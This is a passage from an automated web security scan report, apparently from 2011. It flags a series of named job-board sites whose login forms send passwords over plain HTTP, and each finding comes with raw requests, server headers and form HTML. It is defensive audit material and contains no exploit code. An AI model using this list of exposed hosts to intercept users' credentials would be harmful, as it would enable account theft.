Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117478

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.facilitiescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.50. http://www.financialservicescrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.financialservicescrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.financialservicescrossing.com/index.php

The form contains the following password field:
clslogin_password

Request

GET / HTTP/1.1
Host: www.financialservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qsnigj0dejirrlqc4mq67l7kd4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117666

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.financialservicescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.51. http://www.foodservicescrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foodservicescrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.foodservicescrossing.com/index.php

The form contains the following password field:
clslogin_password

Request

GET / HTTP/1.1
Host: www.foodservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=eh1vjkcudnunpfbo2nu0rbgdm5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110006

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.foodservicescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.52. http://www.fundraisingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fundraisingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.fundraisingcrossing.com/index.php

The form contains the following password field:
clslogin_password

Request

GET / HTTP/1.1
Host: www.fundraisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:23 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=8b0film2tj8qfoehbgchdt1as6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97962

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.fundraisingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.53. http://www.giscrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.giscrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.giscrossing.com/index.php

The form contains the following password field:
clslogin_password

Request

GET / HTTP/1.1
Host: www.giscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:26 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0a97dse4dq233td161telhv1q5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:26 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109314

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.giscrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.54. http://www.governmentcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.governmentcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.governmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:48 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ipjkgrjvb62q6cj7quksggdq0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:48 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117229

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.governmentcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.55. http://www.graduateschoolloans.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.graduateschoolloans.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.graduateschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:56 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=pv00mgmh60i7tksicjfc8juuq5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92867

<script type="text/javascript" src="http://www.graduateschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.graduateschoolloans.com/script/overlibmws_scroll.j
...[SNIP]...
<table cellspacing="0" cellpadding="1" border="0">
<form action="/index.php" name="formaccountlogin" method="post">
           <input type="hidden" name="clslsluserlogin_hdnsubmited" value="1">
...[SNIP]...
<td><input type="password" name="clsregistration_password" class="inputbox" value="Password" onclick="emptytxtboxpassword();"></td>
...[SNIP]...

6.56. http://www.healthcarecrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthcarecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.healthcarecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:59 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pv7nj7m5sv3h8sbbsgp6rc6ju4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 140242

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.healthcarecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.57. http://www.helpdeskcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.helpdeskcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.helpdeskcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=20p261b30i1nrgola0d06ago67; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108384

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.helpdeskcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.58. http://www.hospitalitycrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hospitalitycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.hospitalitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=q8m0d2m0af2bg06uti2kh5prd0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 129154

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.hospitalitycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.59. http://www.hrcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hrcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.hrcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=p4a701ljjtkci3m6f866chs876; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116534

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.hrcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.60. http://www.hvaccrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hvaccrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.hvaccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pber3q1f9cj4n51gq3upv43jp0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112628

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.hvaccrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.61. http://www.informationtechnologycrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationtechnologycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.informationtechnologycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:43 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=k1m7ouon0b4rcae41h2bgg8ig6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:43 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133954

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.informationtechnologycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
